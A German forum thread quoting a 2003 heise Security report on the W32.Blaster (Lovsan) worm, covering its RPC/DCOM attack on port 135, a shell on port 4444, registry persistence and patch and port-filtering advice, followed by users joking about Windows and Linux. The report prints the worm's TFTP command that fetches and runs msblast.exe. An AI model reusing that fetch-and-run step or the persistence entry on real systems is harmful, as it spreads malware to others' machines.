Alle Schotten dicht -- W32.Blaster greift an

DJ Doena

Admiral
Teammitglied
Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Einträge erzeugt:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill


Erkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darüberhinaus öffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geöffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geöffnet werden, also auf eingehende Verbindungen warten.

Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.

Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c\'t)
Quelle: http://www.heise.de/security/news/meldung/39347
 
Es gibt auch im Gamestar Forum ein paar Treads zu diesem Thema:
http://www.gamestar.de/news/software/13478/
http://forum.gamestar.de/vbb/showthread.php?s=&threadid=165150
http://forum.gamestar.de/vbb/showthread.php?s=&threadid=165103

Andere hilfreiche Links:

Hier gibt es das Tool: http://www.sarc.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html

Das hier hilft villeicht auch weiter: http://www.8ung.at/deadi/windowsxpfehler.txt

Weiss nicht ob es wen interesiert dachte aber ich poste es hier mal.
 
DJ Doena schrieb:
W32.Blaster macht sich (wie man lesen kann!) eine Lücke in einem RPC (Remote Procedure Call) zunutze, demnach es völlig egal ist, welche Mail-Suite man benutzt.

Dann grüße ich halt alle "ich öffne jeden Mail-Anhang-Leute"
 
:D

wer ließt schon Virenbeschreibungen?, die sind eher eine errinerung daran seinen Virenscanner zu aktualisieren, obwohl ich das wöchenlich mache.
 
Da sag ich einfach:

Alarmstufe Rot und Kampfstationen besetzen. Portblocker hoch und ab geht die Post ;)
 
Wenn jetzt wieder dieses übliche "Mit Linux wär das nicht passiert" losgeht, dann flipp ich aus. Ich kanns einfach nicht mehr hören.
 
Roi Danton schrieb:
Wenn jetzt wieder dieses übliche "Mit Linux wär das nicht passiert" losgeht, dann flipp ich aus. Ich kanns einfach nicht mehr hören.

also Zzustände wie bei Heise.de herschen hier ja nicht. Aber man kann ja sagen: mit Win98 wär das nicht passiert :D
 
ich hab weder das eine, noch das andere tool.
abwarten, kaffee trinken und erst dann wird schadensregulierung gemacht.

und bisher hat sich mein pc nicht selbsständig gemacht, im gegensatz zu meinem mülleimer ^^
 
spezies5618 schrieb:


also Zzustände wie bei Heise.de herschen hier ja nicht. Aber man kann ja sagen: mit Win98 wär das nicht passiert :D

Gottseidank nicht, die Heise Kommentare sind ja größtenteils Schwachsinn.
 
ich muss sagen, ich bin auch froh, linux zu haben. aber nicht auf den workstations, sondern als anständige firewall mit proxyserver.

mail/fax läuft bei mir über tobit david on w2k server. inklusive virus protection, gleich serverseitig.

das ist die lösung, die ich auch bedenkenlos meinen kunden verkaufen kann...
 
stimmt mit Win9x wär das nicht passiert. Das bleibt ja bei feindkontakt unbenutzbar.
Achja nur für Roi Danton. Mit Linux wär das nicht passiert. :)
 
Zurück
Oben